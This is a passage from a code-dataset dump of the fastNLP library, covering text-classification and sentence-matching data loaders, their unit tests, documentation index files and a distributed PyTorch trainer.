https://nlp.stanford.edu/pubs/SocherBauerManningNg_ACL2013.pdf\n\n :return:\n \"\"\"\n output_dir = self._get_dataset_path(dataset_name='sst-2')\n return output_dir\n\n\nclass ChnSentiCorpLoader(Loader):\n \"\"\"\n 支持读取的数据的格式为,第一行为标题(具体内容会被忽略),之后一行为一个sample,第一个制表符之前被认为是label,第\n 一个制表符之后认为是句子\n\n Example::\n\n label\traw_chars\n 1\t這間酒店環境和服務態度亦算不錯,但房間空間太小~~\n 1\t<荐书> 推荐所有喜欢<红楼>的红迷们一定要收藏这本书,要知道...\n 0\t商品的不足暂时还没发现,京东的订单处理速度实在.......周二就打包完成,周五才发货...\n\n 读取后的DataSet具有以下的field\n\n .. csv-table::\n :header: \"raw_chars\", \"target\"\n\n \"這間酒店環境和服務態度亦算不錯,但房間空間太小~~\", \"1\"\n \"<荐书> 推荐所有喜欢<红楼>...\", \"1\"\n \"...\"\n\n \"\"\"\n def __init__(self):\n super().__init__()\n\n def _load(self, path:str):\n \"\"\"\n 从path中读取数据\n\n :param path:\n :return:\n \"\"\"\n ds = DataSet()\n with open(path, 'r', encoding='utf-8') as f:\n f.readline()\n for line in f:\n line = line.strip()\n tab_index = line.index('\\t')\n if tab_index!=-1:\n target = line[:tab_index]\n raw_chars = line[tab_index+1:]\n if raw_chars:\n ds.append(Instance(raw_chars=raw_chars, target=target))\n return ds\n\n def download(self)->str:\n \"\"\"\n 自动下载数据,该数据取自https://github.com/pengming617/bert_classification/tree/master/data,在\n https://arxiv.org/pdf/1904.09223.pdf与https://arxiv.org/pdf/1906.08101.pdf有使用\n\n :return:\n \"\"\"\n output_dir = self._get_dataset_path('chn-senti-corp')\n return output_dir\n" }, { "alpha_fraction": 0.6086474657058716, "alphanum_fraction": 0.6164079904556274, "avg_line_length": 39.0444450378418, "blob_id": "9aa9e289e9647f4dbdae7e132667d8649a847548", "content_id": "8d6e182cc8bcbfed1522eaaf3ddf0f9ba67caf6c", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1804, "license_type": "permissive", "max_line_length": 87, "num_lines": 45, "path": "/test/io/loader/test_matching_loader.py", "repo_name": "brxx122/fastNLP", "src_encoding": "UTF-8", "text": "\nimport unittest\n\nfrom fastNLP.io import DataBundle\nfrom fastNLP.io.loader.matching import RTELoader\nfrom fastNLP.io.loader.matching import QNLILoader\nfrom fastNLP.io.loader.matching import SNLILoader\nfrom fastNLP.io.loader.matching import QuoraLoader\nfrom fastNLP.io.loader.matching import MNLILoader\nimport os\n\[email protected]('TRAVIS' in os.environ, \"Skip in travis\")\nclass TestMatchingDownload(unittest.TestCase):\n def test_download(self):\n for loader in [RTELoader, QNLILoader, SNLILoader, MNLILoader]:\n loader().download()\n with self.assertRaises(Exception):\n QuoraLoader().load()\n\n def test_load(self):\n for loader in [RTELoader, QNLILoader, SNLILoader, MNLILoader]:\n data_bundle = loader().load()\n print(data_bundle)\n\n\nclass TestMatchingLoad(unittest.TestCase):\n def test_load(self):\n data_set_dict = {\n 'RTE': ('test/data_for_tests/io/RTE', RTELoader, (5, 5, 5), True),\n 'SNLI': ('test/data_for_tests/io/SNLI', SNLILoader, (5, 5, 5), False),\n 'QNLI': ('test/data_for_tests/io/QNLI', QNLILoader, (5, 5, 5), True),\n 'MNLI': ('test/data_for_tests/io/MNLI', MNLILoader, (5, 5, 5, 5, 6), True),\n }\n for k, v in data_set_dict.items():\n path, loader, instance, warns = v\n if warns:\n with self.assertWarns(Warning):\n data_bundle = loader().load(path)\n else:\n data_bundle = loader().load(path)\n\n self.assertTrue(isinstance(data_bundle, DataBundle))\n self.assertEqual(len(instance), data_bundle.num_dataset)\n for x, y in zip(instance, data_bundle.iter_datasets()):\n name, dataset = y\n self.assertEqual(x, len(dataset))\n\n" }, { "alpha_fraction": 0.738095223903656, "alphanum_fraction": 0.7547619342803955, "avg_line_length": 40.95000076293945, "blob_id": "51050d41472aad03eecf9f6b92497d73ad1bdf8f", "content_id": "e19f252bd68cd679218227d2c4f36a79809bf11e", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 1230, "license_type": "permissive", "max_line_length": 78, "num_lines": 20, "path": "/docs/source/user/tutorials.rst", "repo_name": "brxx122/fastNLP", "src_encoding": "UTF-8", "text": "========================\nfastNLP 详细使用教程\n========================\n\n这里是更详细的使用教程。对于大部分的用户,我们建议你从第一篇开始顺序阅读;如果你只想了解其中的一部分,也可以进行选读。\n\n.. toctree::\n :maxdepth: 1\n\n 使用DataSet预处理文本 </tutorials/tutorial_1_data_preprocess>\n 使用Vocabulary转换文本与index </tutorials/tutorial_2_vocabulary>\n 使用Embedding模块将文本转成向量 </tutorials/tutorial_3_embedding>\n 使用Loader和Pipe加载并处理数据集 </tutorials/tutorial_4_load_dataset>\n 动手实现一个文本分类器II-使用DataSetIter实现自定义训练过程 </tutorials/tutorial_5_datasetiter>\n 动手实现一个文本分类器I-使用Trainer和Tester快速训练和测试 </tutorials/tutorial_6_loss_optimizer>\n 使用Metric快速评测你的模型 </tutorials/tutorial_7_metrics>\n 使用Modules和Models快速搭建自定义模型 </tutorials/tutorial_8_modules_models>\n 快速实现序列标注模型 </tutorials/tutorial_9_seq_labeling>\n 使用Callback自定义你的训练过程 </tutorials/tutorial_10_callback>\n 使用fitlog 辅助 fastNLP 进行科研 </tutorials/tutorial_11_fitlog>\n\n" }, { "alpha_fraction": 0.6178608536720276, "alphanum_fraction": 0.642782986164093, "avg_line_length": 39.125, "blob_id": "3468aad561c0648ae170d5c02697ec1963724501", "content_id": "4ecd79693f7f9b2941d0ec4db650db2f2e8a8d35", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 963, "license_type": "permissive", "max_line_length": 100, "num_lines": 24, "path": "/test/io/pipe/test_conll.py", "repo_name": "brxx122/fastNLP", "src_encoding": "UTF-8", "text": "import unittest\nimport os\nfrom fastNLP.io import MsraNERPipe, PeopleDailyPipe, WeiboNERPipe, Conll2003Pipe, Conll2003NERPipe\n\n\[email protected]('TRAVIS' in os.environ, \"Skip in travis\")\nclass TestConllPipe(unittest.TestCase):\n def test_process_from_file(self):\n for pipe in [MsraNERPipe, PeopleDailyPipe, WeiboNERPipe]:\n with self.subTest(pipe=pipe):\n print(pipe)\n data_bundle = pipe(bigrams=True, trigrams=True).process_from_file()\n print(data_bundle)\n data_bundle = pipe(encoding_type='bioes').process_from_file()\n print(data_bundle)\n\n\nclass TestRunPipe(unittest.TestCase):\n def test_conll2003(self):\n for pipe in [Conll2003Pipe, Conll2003NERPipe]:\n with self.subTest(pipe=pipe):\n print(pipe)\n data_bundle = pipe().process_from_file('test/data_for_tests/conll_2003_example.txt')\n print(data_bundle)\n" }, { "alpha_fraction": 0.773542582988739, "alphanum_fraction": 0.7937219738960266, "avg_line_length": 73.16666412353516, "blob_id": "eca219b30d17a675b43a65981f487e8c3e1fd4d1", "content_id": "c1af6c0c1679527c72673f27f16f20ef47056baf", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 446, "license_type": "permissive", "max_line_length": 350, "num_lines": 6, "path": "/docs/source/fastNLP.io.loader.rst", "repo_name": "brxx122/fastNLP", "src_encoding": "UTF-8", "text": "fastNLP.io.loader\n=================\n\n.. automodule:: fastNLP.io.loader\n :members: Loader, YelpLoader, YelpFullLoader, YelpPolarityLoader, IMDBLoader, SSTLoader, SST2Loader, ChnSentiCorpLoader, ConllLoader, Conll2003Loader, Conll2003NERLoader, OntoNotesNERLoader, CTBLoader, MsraNERLoader, PeopleDailyNERLoader, WeiboNERLoader, CSVLoader, JsonLoader, CWSLoader, MNLILoader, QuoraLoader, SNLILoader, QNLILoader, RTELoader\n :inherited-members:\n\n" }, { "alpha_fraction": 0.566630482673645, "alphanum_fraction": 0.5719228982925415, "avg_line_length": 40.39887619018555, "blob_id": "26080e20987d8decc2c92e34bdd0e52baf3e2b9b", "content_id": "3a2934475ee3fcb3defcaf9d626586732686bc12", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 14764, "license_type": "permissive", "max_line_length": 124, "num_lines": 356, "path": "/fastNLP/core/dist_trainer.py", "repo_name": "brxx122/fastNLP", "src_encoding": "UTF-8", "text": "\"\"\"undocumented\n正在开发中的分布式训练代码\n\"\"\"\nimport logging\nimport os\nimport time\nfrom datetime import datetime\n\nimport torch\nimport torch.cuda\nimport torch.distributed as dist\nimport torch.optim\nfrom pkg_resources import parse_version\nfrom torch.nn.parallel import DistributedDataParallel as DDP\nfrom torch.utils.data.distributed import DistributedSampler\nfrom tqdm import tqdm\n\nfrom ._logger import logger\nfrom .batch import DataSetIter, BatchIter\nfrom .callback import DistCallbackManager, CallbackException, TesterCallback\nfrom .dataset import DataSet\nfrom .losses import _prepare_losser\nfrom .optimizer import Optimizer\nfrom .utils import _build_args\nfrom .utils import _get_func_signature\nfrom .utils import _move_dict_value_to_device\n\n__all__ = [\n 'get_local_rank',\n 'DistTrainer',\n]\n\n\ndef get_local_rank():\n if 'LOCAL_RANK' in os.environ:\n return int(os.environ['LOCAL_RANK'])\n from argparse import ArgumentParser\n parser = ArgumentParser()\n parser.add_argument('--local_rank', type=int)\n args, _ = parser.parse_known_args()\n if 'local_rank' in args and args.local_rank:\n os.environ['LOCAL_RANK'] = str(args.local_rank) # for multiple calls for this function\n return args.local_rank\n raise RuntimeError('Please use \"python -m torch.distributed.launch --nproc_per_node=N train_script.py')\n\n\nclass DistTrainer():\n \"\"\"\n Distributed Trainer that support distributed and mixed precision training\n \"\"\"\n def __init__(self, train_data, model, optimizer=None, loss=None,\n callbacks_all=None, callbacks_master=None,\n batch_size_per_gpu=8, n_epochs=1,\n num_workers=1, drop_last=False,\n dev_data=None, metrics=None, metric_key=None,\n update_every=1, print_every=10, validate_every=-1,\n save_every=-1, save_path=None, device='auto',\n fp16='', backend=None, init_method=None):\n\n assert device in ['auto', 'cuda', 'cpu'], \"Please set correct device in [auto', 'cuda', 'cpu']\"\n if device == 'auto':\n device = 'cuda' if torch.cuda.is_available() else 'cpu'\n if backend is None:\n backend = 'nccl' if device == 'cuda' else 'gloo'\n\n # init distributed\n if device == 'cuda':\n torch.cuda.set_device(get_local_rank())\n self.device = torch.device(\"cuda\", get_local_rank())\n else:\n self.device = torch.device(device)\n\n dist.init_process_group(backend=backend, init_method=init_method)\n self.world_size = dist.get_world_size()\n self.rank = dist.get_rank() # unique id for each process\n\n self.model = model\n self.train_data = train_data\n self.batch_size_per_gpu = int(batch_size_per_gpu)\n self.n_epochs = int(n_epochs)\n self.num_data_workers = int(num_workers)\n self.drop_last = drop_last\n self.update_every = int(update_every)\n self.print_every = int(print_every)\n self.validate_every = int(validate_every)\n self.save_every = int(save_every)\n self.save_path = save_path\n self.losser = _prepare_losser(loss)\n self.fp16 = fp16\n self.init_method = init_method\n self.backend = backend\n self.local_rank = get_local_rank()\n self._forward_func = model.forward\n self.callback_manager = DistCallbackManager(\n env={\"trainer\": self}, callbacks_all=callbacks_all,\n callbacks_master=callbacks_master)\n self.metric_key = metric_key\n\n model.to(self.device)\n optimizer = self._get_optimizer(optimizer)\n\n # init fp16, must before DataParallel init\n if len(self.fp16):\n assert isinstance(self.fp16, str), \"Please set Apex AMP optimization level selected in ['O0', 'O1', 'O2', 'O3']\"\n try:\n from apex import amp\n except ImportError:\n raise ImportError(\"Please install apex from https://www.github.com/nvidia/apex to use fp16 training.\")\n assert torch.backends.cudnn.enabled, \"Amp requires cudnn backend to be enabled.\"\n assert device == 'cuda', \"Amp requires cuda device\"\n model, optimizer = amp.initialize(model, optimizer, opt_level=self.fp16)\n\n # init DataParallel\n if parse_version(torch.__version__)>=parse_version('1.1'):\n self.model = DDP(model, device_ids=[self.local_rank],\n output_device=self.local_rank, find_unused_parameters=True)\n else:\n self.model = DDP(model, device_ids=[self.local_rank],\n output_device=self.local_rank)\n\n self.optimizer = optimizer\n self.sampler = DistributedSampler(self.train_data)\n self.data_iterator = self._get_data_iter(self.train_data)\n self.n_steps = self._get_n_steps()\n\n # for evaluation, only run eval on master proc\n if dev_data and metrics:\n cb = TesterCallback(\n dev_data, model, metrics,\n batch_size=batch_size_per_gpu, num_workers=num_workers)\n self.callback_manager.add_callback([cb], master=True)\n\n # Setup logging\n dist.barrier()\n self.start_time = datetime.now().strftime('%m_%d_%Y-%H_%M')\n if self.save_path:\n self.cp_save_path = os.path.join(self.save_path, 'checkpoints', self.start_time)\n else:\n self.cp_save_path = None\n\n # use INFO in the master, WARN for others\n logger.setLevel(logging.INFO if self.is_master else logging.WARNING)\n self.logger = logger\n self.logger.info(\"Setup Distributed Trainer\")\n self.logger.warning(\"Process pid: {}, rank: {}, local rank: {}, device: {}, fp16: {}\".format(\n os.getpid(), self.rank, self.local_rank, self.device, self.fp16 if self.fp16 else False))\n self.logger.info(\"Num of processes: {}\".format(self.world_size))\n self.logger.info(\"Use device: {}\".format(device))\n self.logger.info(\"Training with fp16: {}, optimization level: {}\".format(\n len(self.fp16) > 0, self.fp16 if self.fp16 else None))\n\n def _get_n_steps(self):\n batch_size = self.world_size * self.batch_size_per_gpu\n return (len(self.train_data) // batch_size + int(\n len(self.train_data) % batch_size != 0)) * int(self.drop_last == 0) * self.n_epochs\n\n def _get_data_iter(self, dataset):\n if isinstance(dataset, DataSet):\n return DataSetIter(\n dataset=dataset, batch_size=self.batch_size_per_gpu,\n num_workers=self.num_data_workers, sampler=self.sampler,\n drop_last=self.drop_last\n )\n elif isinstance(dataset, BatchIter):\n return dataset\n else:\n raise TypeError(\"train_data type {} not support\".format(type(dataset)))\n\n def _get_optimizer(self, optimizer):\n if isinstance(optimizer, torch.optim.Optimizer):\n return optimizer\n elif isinstance(optimizer, Optimizer):\n return optimizer.construct_from_pytorch(self.model.parameters())\n elif optimizer is None:\n return torch.optim.Adam(self.model.parameters(), lr=4e-3)\n else:\n raise TypeError(\"optimizer can only be torch.optim.Optimizer type, not {}.\".format(type(optimizer)))\n\n @property\n def is_master(self):\n return self.rank == 0\n\n def train(self, on_exception='auto'):\n try:\n self.logger.info(\"###### Training epochs started ######\")\n self.logger.info('Total epochs: %d'% self.n_epochs)\n self.logger.info('Total steps: %d'% self.n_steps)\n self.logger.info('Num instances per GPU %d'% self.batch_size_per_gpu)\n self.logger.info('Total batch_size: %d'% self.batch_size_per_gpu * dist.get_world_size())\n self.logger.info('Total num of samples: %d'% len(self.train_data))\n self.logger.info(\"Num of callbacks for all workers: {}\".format(\n len(self.callback_manager.callbacks_all)))\n self.logger.info(\"Num of callbacks for master workers: {}\".format(\n len(self.callback_manager.callbacks_master)))\n self.logger.info(\"Callbacks for all workers: {}\".format(\n [repr(cb) for cb in self.callback_manager.callbacks_all]))\n self.logger.info(\"Callbacks for master workers: {}\".format(\n [repr(cb) for cb in self.callback_manager.callbacks_master]))\n\n start_time = time.time()\n results = {}\n if self.n_epochs <= 0:\n self.logger.info(\"Training epoch is {}, nothing was done.\".format(self.n_epochs))\n results['seconds'] = 0.\n return results\n\n try:\n self.callback_manager.on_train_begin()\n self._train()\n self.callback_manager.on_train_end()\n\n except BaseException as e:\n self.callback_manager.on_exception(e)\n if on_exception == 'auto':\n if not isinstance(e, (CallbackException, KeyboardInterrupt)):\n raise e\n else:\n self.logger.info('Catch {}, ignored.'.format(e.__class__.__name__))\n elif on_exception == 'raise':\n raise e\n\n results['seconds'] = round(time.time() - start_time, 2)\n self.logger.info(\"###### Train finished ######\")\n self.logger.info('Total train time: {} seconds.'. format(results['seconds']))\n return results\n finally:\n self.close()\n\n def _train(self):\n if self.fp16:\n # skip check, done in __init__()\n from apex import amp\n self.step = 0\n self.epoch = 0\n self.pbar = tqdm(total=self.n_steps, postfix='loss:{0:<6.5f}',\n leave=False, dynamic_ncols=True, disable=not self.is_master)\n pbar = self.pbar\n avg_loss = 0\n data_iterator = self.data_iterator\n self.model.zero_grad()\n for epoch in range(1, self.n_epochs + 1):\n self.epoch = epoch\n pbar.set_description_str(desc=\"Epoch {}/{}\".format(epoch, self.n_epochs))\n # early stopping\n self.callback_manager.on_epoch_begin()\n for batch_x, batch_y in data_iterator:\n self.model.train()\n self.step += 1\n _move_dict_value_to_device(batch_x, batch_y, device=self.device)\n indices = data_iterator.get_batch_indices()\n # negative sampling; replace unknown; re-weight batch_y\n self.callback_manager.on_batch_begin(batch_x, batch_y, indices)\n prediction = self._data_forward(self.model, batch_x)\n\n # edit prediction\n self.callback_manager.on_loss_begin(batch_y, prediction)\n loss = self._compute_loss(prediction, batch_y)\n avg_loss += loss.item()\n\n # Is loss NaN or inf? requires_grad = False\n self.callback_manager.on_backward_begin(loss)\n\n if self.fp16:\n with amp.scale_loss(loss, self.optimizer) as scale_loss:\n scale_loss.backward()\n else:\n loss.backward()\n\n self.callback_manager.on_backward_end()\n\n self._update()\n self.callback_manager.on_step_end()\n\n if self.step % self.print_every == 0:\n avg_loss = float(avg_loss) / self.print_every\n print_output = \"loss:{:<6.5f}\".format(avg_loss)\n pbar.update(self.print_every)\n pbar.set_postfix_str(print_output)\n avg_loss = 0\n\n self.callback_manager.on_batch_end()\n\n if (self.validate_every > 0 and self.step % self.validate_every == 0):\n self._do_validation()\n\n if self.cp_save_path and \\\n self.save_every > 0 and \\\n self.step % self.save_every == 0:\n self.save_check_point()\n\n # ================= mini-batch end ==================== #\n if self.validate_every < 0:\n self._do_validation()\n\n if self.save_every < 0 and self.cp_save_path:\n self.save_check_point()\n # lr decay; early stopping\n self.callback_manager.on_epoch_end()\n # =============== epochs end =================== #\n pbar.close()\n self.pbar = None\n # ============ tqdm end ============== #\n\n def _update(self):\n \"\"\"Perform weight update on a model.\n\n \"\"\"\n if self.step % self.update_every == 0:\n self.optimizer.step()\n self.model.zero_grad()\n\n def _data_forward(self, network, x):\n x = _build_args(self._forward_func, **x)\n y = network(**x)\n if not isinstance(y, dict):\n raise TypeError(\n f\"The return value of {_get_func_signature(self._forward_func)} should be dict, got {type(y)}.\")\n return y\n\n def _compute_loss(self, predict, truth):\n \"\"\"Compute loss given prediction and ground truth.\n\n :param predict: prediction dict, produced by model.forward\n :param truth: ground truth dict, produced by batch_y\n :return: a scalar\n \"\"\"\n loss = self.losser(predict, truth)\n if self.update_every > 1:\n loss = loss / self.update_every\n return loss.mean()\n\n def save_check_point(self, only_params=False):\n # only master save models\n if self.is_master:\n os.makedirs(self.cp_save_path, exist_ok=True)\n path = os.path.join(self.cp_save_path, 'checkpoint-{}.bin'.format(self.step))\n self.logger.info(\"Save checkpoint to {}\".format(path))\n model_to_save = self.model.module\n if only_params:\n model_to_save = model_to_save.state_dict()\n torch.save(model_to_save, path)\n\n def _do_validation(self):\n self.callback_manager.on_valid_begin()\n eval_res = self.callback_manager.on_validation()\n eval_res = list(filter(lambda x: x is not None, eval_res))\n if len(eval_res):\n eval_res, is_better = list(zip(*eval_res))\n else:\n eval_res, is_better = None, None\n self.callback_manager.on_valid_end(\n eval_res, self.metric_key, self.optimizer, is_better)\n dist.barrier()\n\n def close(self):\n dist.destroy_process_group()\n" }, { "alpha_fraction": 0.622535228729248, "alphanum_fraction": 0.6323943734169006, "avg_line_length": 44.27659606933594, "blob_id": "1ce326efc014e752e0e22f266d2e969d987be177", "content_id": "fdfc90081154217d70e7f55f6fcfe83d63948373", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2130, "license_type": "permissive", "max_line_length": 114, "num_lines": 47, "path": "/test/io/loader/test_classification_loader.py", "repo_name": "brxx122/fastNLP", "src_encoding": "UTF-8", "text": "\nimport unittest\n\nfrom fastNLP.io import DataBundle\nfrom fastNLP.io.loader.classification import YelpFullLoader\nfrom fastNLP.io.loader.classification import YelpPolarityLoader\nfrom fastNLP.io.loader.classification import IMDBLoader\nfrom fastNLP.io.loader.classification import SST2Loader\nfrom fastNLP.io.loader.classification import SSTLoader\nfrom fastNLP.io.loader.classification import ChnSentiCorpLoader\nimport os\n\n\[email protected]('TRAVIS' in os.environ, \"Skip in travis\")\nclass TestDownload(unittest.TestCase):\n def test_download(self):\n for loader in [YelpFullLoader, YelpPolarityLoader, IMDBLoader, SST2Loader, SSTLoader, ChnSentiCorpLoader]:\n loader().download()\n\n def test_load(self):\n for loader in [YelpFullLoader, YelpPolarityLoader, IMDBLoader, SST2Loader, SSTLoader, ChnSentiCorpLoader]:\n data_bundle = loader().load()\n print(data_bundle)\n\n\nclass TestLoad(unittest.TestCase):\n def test_process_from_file(self):\n data_set_dict = {\n 'yelp.p': ('test/data_for_tests/io/yelp_review_polarity', YelpPolarityLoader, (6, 6, 6), False),\n 'yelp.f': ('test/data_for_tests/io/yelp_review_full', YelpFullLoader, (6, 6, 6), False),\n 'sst-2': ('test/data_for_tests/io/SST-2', SST2Loader, (5, 5, 5), True),\n 'sst': ('test/data_for_tests/io/SST', SSTLoader, (6, 6, 6), False),\n 'imdb': ('test/data_for_tests/io/imdb', IMDBLoader, (6, 6, 6), False),\n }\n for k, v in data_set_dict.items():\n path, loader, data_set, warns = v\n with self.subTest(loader=loader):\n if warns:\n with self.assertWarns(Warning):\n data_bundle = loader().load(path)\n else:\n data_bundle = loader().load(path)\n\n self.assertTrue(isinstance(data_bundle, DataBundle))\n self.assertEqual(len(data_set), data_bundle.num_dataset)\n for x, y in zip(data_set, data_bundle.iter_datasets()):\n name, dataset = y\n self.assertEqual(x, len(dataset))\n\n" }, { "alpha_fraction": 0.5733829736709595, "alphanum_fraction": 0.5812353491783142, "avg_line_length": 39.63486862182617, "blob_id": "d6f6843d3d27ee62dd06697a80ecc5c116dda789", "content_id": "d6506f669bdc034f49e8877f9b8ecae7fbe424fd", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 12959, "license_type": "permissive", "max_line_length": 117, "num_lines": 304, "path": "/fastNLP/io/pipe/matching.py", "repo_name": "brxx122/fastNLP", "src_encoding": "UTF-8", "text": "\"\"\"undocumented\"\"\"\n\n__all__ = [\n \"MatchingBertPipe\",\n \"RTEBertPipe\",\n \"SNLIBertPipe\",\n \"QuoraBertPipe\",\n \"QNLIBertPipe\",\n \"MNLIBertPipe\",\n \"MatchingPipe\",\n \"RTEPipe\",\n \"SNLIPipe\",\n \"QuoraPipe\",\n \"QNLIPipe\",\n \"MNLIPipe\",\n]\n\nimport warnings\n\nfrom .pipe import Pipe\nfrom .utils import get_tokenizer\nfrom ..loader.matching import SNLILoader, MNLILoader, QNLILoader, RTELoader, QuoraLoader\nfrom ...core.const import Const\nfrom ...core.vocabulary import Vocabulary\nfrom ...core._logger import logger\n\n\nclass MatchingBertPipe(Pipe):\n \"\"\"\n Matching任务的Bert pipe,输出的DataSet将包含以下的field\n\n .. csv-table::\n :header: \"raw_words1\", \"raw_words2\", \"words\", \"target\", \"seq_len\"\n\n \"The new rights are...\", \"Everyone really likes..\", \"[2, 3, 4, 5, ...]\", 1, 10\n \"This site includes a...\", \"The Government Executive...\", \"[11, 12, 13,...]\", 0, 5\n \"...\", \"...\", \"[...]\", ., .\n\n words列是将raw_words1(即premise), raw_words2(即hypothesis)使用\"[SEP]\"链接起来转换为index的。\n words列被设置为input,target列被设置为target和input(设置为input以方便在forward函数中计算loss,\n 如果不在forward函数中计算loss也不影响,fastNLP将根据forward函数的形参名进行传参).\n\n \"\"\"\n \n def __init__(self, lower=False, tokenizer: str = 'raw'):\n \"\"\"\n \n :param bool lower: 是否将word小写化。\n :param str tokenizer: 使用什么tokenizer来将句子切分为words. 支持spacy, raw两种。raw即使用空格拆分。\n \"\"\"\n super().__init__()\n \n self.lower = bool(lower)\n self.tokenizer = get_tokenizer(tokenize_method=tokenizer)\n \n def _tokenize(self, data_bundle, field_names, new_field_names):\n \"\"\"\n\n :param DataBundle data_bundle: DataBundle.\n :param list field_names: List[str], 需要tokenize的field名称\n :param list new_field_names: List[str], tokenize之后field的名称,与field_names一一对应。\n :return: 输入的DataBundle对象\n \"\"\"\n for name, dataset in data_bundle.datasets.items():\n for field_name, new_field_name in zip(field_names, new_field_names):\n dataset.apply_field(lambda words: self.tokenizer(words), field_name=field_name,\n new_field_name=new_field_name)\n return data_bundle\n \n def process(self, data_bundle):\n for dataset in data_bundle.datasets.values():\n if dataset.has_field(Const.TARGET):\n dataset.drop(lambda x: x[Const.TARGET] == '-')\n \n for name, dataset in data_bundle.datasets.items():\n dataset.copy_field(Const.RAW_WORDS(0), Const.INPUTS(0), )\n dataset.copy_field(Const.RAW_WORDS(1), Const.INPUTS(1), )\n \n if self.lower:\n for name, dataset in data_bundle.datasets.items():\n dataset[Const.INPUTS(0)].lower()\n dataset[Const.INPUTS(1)].lower()\n \n data_bundle = self._tokenize(data_bundle, [Const.INPUTS(0), Const.INPUTS(1)],\n [Const.INPUTS(0), Const.INPUTS(1)])\n \n # concat两个words\n def concat(ins):\n words0 = ins[Const.INPUTS(0)]\n words1 = ins[Const.INPUTS(1)]\n words = words0 + ['[SEP]'] + words1\n return words\n \n for name, dataset in data_bundle.datasets.items():\n dataset.apply(concat, new_field_name=Const.INPUT)\n dataset.delete_field(Const.INPUTS(0))\n dataset.delete_field(Const.INPUTS(1))\n \n word_vocab = Vocabulary()\n word_vocab.from_dataset(*[dataset for name, dataset in data_bundle.datasets.items() if 'train' in name],\n field_name=Const.INPUT,\n no_create_entry_dataset=[dataset for name, dataset in data_bundle.datasets.items() if\n 'train' not in name])\n word_vocab.index_dataset(*data_bundle.datasets.values(), field_name=Const.INPUT)\n \n target_vocab = Vocabulary(padding=None, unknown=None)\n target_vocab.from_dataset(*[ds for name, ds in data_bundle.iter_datasets() if 'train' in name],\n field_name=Const.TARGET,\n no_create_entry_dataset=[ds for name, ds in data_bundle.iter_datasets()\n if ('train' not in name) and (ds.has_field(Const.TARGET))]\n )\n if len(target_vocab._no_create_word) > 0:\n warn_msg = f\"There are {len(tgt_vocab._no_create_word)} target labels\" \\\n f\" in {[name for name in data_bundle.datasets.keys() if 'train' not in name]} \" \\\n f\"data set but not in train data set!.\"\n warnings.warn(warn_msg)\n logger.warn(warn_msg)\n\n has_target_datasets = [dataset for name, dataset in data_bundle.datasets.items() if\n dataset.has_field(Const.TARGET)]\n target_vocab.index_dataset(*has_target_datasets, field_name=Const.TARGET)\n \n data_bundle.set_vocab(word_vocab, Const.INPUT)\n data_bundle.set_vocab(target_vocab, Const.TARGET)\n \n input_fields = [Const.INPUT, Const.INPUT_LEN]\n target_fields = [Const.TARGET]\n \n for name, dataset in data_bundle.datasets.items():\n dataset.add_seq_len(Const.INPUT)\n dataset.set_input(*input_fields, flag=True)\n for fields in target_fields:\n if dataset.has_field(fields):\n dataset.set_target(fields, flag=True)\n \n return data_bundle\n\n\nclass RTEBertPipe(MatchingBertPipe):\n def process_from_file(self, paths=None):\n data_bundle = RTELoader().load(paths)\n return self.process(data_bundle)\n\n\nclass SNLIBertPipe(MatchingBertPipe):\n def process_from_file(self, paths=None):\n data_bundle = SNLILoader().load(paths)\n return self.process(data_bundle)\n\n\nclass QuoraBertPipe(MatchingBertPipe):\n def process_from_file(self, paths):\n data_bundle = QuoraLoader().load(paths)\n return self.process(data_bundle)\n\n\nclass QNLIBertPipe(MatchingBertPipe):\n def process_from_file(self, paths=None):\n data_bundle = QNLILoader().load(paths)\n return self.process(data_bundle)\n\n\nclass MNLIBertPipe(MatchingBertPipe):\n def process_from_file(self, paths=None):\n data_bundle = MNLILoader().load(paths)\n return self.process(data_bundle)\n\n\nclass MatchingPipe(Pipe):\n \"\"\"\n Matching任务的Pipe。输出的DataSet将包含以下的field\n\n .. csv-table::\n :header: \"raw_words1\", \"raw_words2\", \"words1\", \"words2\", \"target\", \"seq_len1\", \"seq_len2\"\n\n \"The new rights are...\", \"Everyone really likes..\", \"[2, 3, 4, 5, ...]\", \"[10, 20, 6]\", 1, 10, 13\n \"This site includes a...\", \"The Government Executive...\", \"[11, 12, 13,...]\", \"[2, 7, ...]\", 0, 6, 7\n \"...\", \"...\", \"[...]\", \"[...]\", ., ., .\n\n words1是premise,words2是hypothesis。其中words1,words2,seq_len1,seq_len2被设置为input;target被设置为target\n 和input(设置为input以方便在forward函数中计算loss,如果不在forward函数中计算loss也不影响,fastNLP将根据forward函数\n 的形参名进行传参)。\n \"\"\"\n \n def __init__(self, lower=False, tokenizer: str = 'raw'):\n \"\"\"\n \n :param bool lower: 是否将所有raw_words转为小写。\n :param str tokenizer: 将原始数据tokenize的方式。支持spacy, raw. spacy是使用spacy切分,raw就是用空格切分。\n \"\"\"\n super().__init__()\n \n self.lower = bool(lower)\n self.tokenizer = get_tokenizer(tokenize_method=tokenizer)\n \n def _tokenize(self, data_bundle, field_names, new_field_names):\n \"\"\"\n\n :param ~fastNLP.DataBundle data_bundle: DataBundle.\n :param list field_names: List[str], 需要tokenize的field名称\n :param list new_field_names: List[str], tokenize之后field的名称,与field_names一一对应。\n :return: 输入的DataBundle对象\n \"\"\"\n for name, dataset in data_bundle.datasets.items():\n for field_name, new_field_name in zip(field_names, new_field_names):\n dataset.apply_field(lambda words: self.tokenizer(words), field_name=field_name,\n new_field_name=new_field_name)\n return data_bundle\n \n def process(self, data_bundle):\n \"\"\"\n 接受的DataBundle中的DataSet应该具有以下的field, target列可以没有\n\n .. csv-table::\n :header: \"raw_words1\", \"raw_words2\", \"target\"\n\n \"The new rights are...\", \"Everyone really likes..\", \"entailment\"\n \"This site includes a...\", \"The Government Executive...\", \"not_entailment\"\n \"...\", \"...\"\n\n :param ~fastNLP.DataBundle data_bundle: 通过loader读取得到的data_bundle,里面包含了数据集的原始数据内容\n :return: data_bundle\n 